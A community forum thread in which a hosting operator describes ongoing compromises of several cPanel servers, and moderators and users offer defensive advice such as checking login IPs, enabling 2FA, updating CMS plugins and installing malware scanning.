Skip to main content

cpanel whm server invation

Comments

8 comments

  • cPRex Jurassic Moderator
    Hey there! It would likely be worth opening a ticket with our team, as any investigation without seeing the server is really just guessing. If the files and directories you are seeing created are owned by the cPanel user, that would indicate the compromise is at the user level, and not the root level of the server, so at least that is good news. This is often a problem caused by keylogging software on customer machines, as passwords get stolen when that user logs into cPanel and sent to the hacker so they can acces the account. If you submit a ticket to our team we can at least rule out common root compromises, and we also may be able to point you in the right direction as to what the original source of the compromise was.
    0
  • Quintanilha-RJ
    The problem is not just one server, but three servers, and not in a specific user account, but in several user accounts, files are being added and files are also being deleted from the end users. this is my preoccupation. could there be some command that i could check these envations.
    0
  • cPRex Jurassic Moderator
    Sure, but it would still be best to look at one of the machines to see if we can determine a cause, as it's extremely unlikely to be related to the cPanel tools. It's also possible a tool such as WordPress has experienced a compromise, either through a plugin or through a tool like AnonymousFox:
    0
  • plesk4lyf
    Quintanilha-RJ, The firewall isn't going to help with exploits of this nature at all, because they're using the services to perform the exploits. It's most likely that website code/CMS/plugins are outdated and have holes that are able to be exploited. You should always keep the code up-to-date so security holes are patched. If it's shared hosting and you don't have that level of control over it, then I recommend looking at: There's no easy fix or silver bullet to prevent exploits on sites.
    0
  • Camilo Herrera
    They are using the cpanel user and password on each account to upload the files, check the last IPs that accessed the cpanel interface (.lastlogin file on the root folder). It may be a phishing attack and users just gave the password away to a malicious e-mail message. Enable 2FA on the accounts, change passwords and install a malware protection software on your servers, CXS is the best regarding price/performance and features
    0
  • Quintanilha-RJ
    I installed CXS on my server to avoid phishing attacks though it has gone down a lot but I still have this problem on 3 cpanel servers. I've been thinking about changing the /home/usuario partition on my server, that would make the path not standard and thus inhibit such virus action. If this is a solution how do I apply it to touch the /home/user partition for example /server/user. The problems I have are password changes, files with permission changed and file inclusion in the cpanel panel to send the end user to another web address I thank you for your help.
    0
  • cPRex Jurassic Moderator
    I don't think changing the path would help with this situation. The user content would just be moved to a different folder. It's probably best to work with a system administrator to help get this fixed with how long this has been happening.
    0
  • Quintanilha-RJ
    this has been happening for some time but it is getting more complicated every day, server being invaded and with .php .html files thus leaving sites offline, and the biggest consequence is the datacenter sending abuse notifications and even risk of shutting down my server!
    0

Please sign in to leave a comment.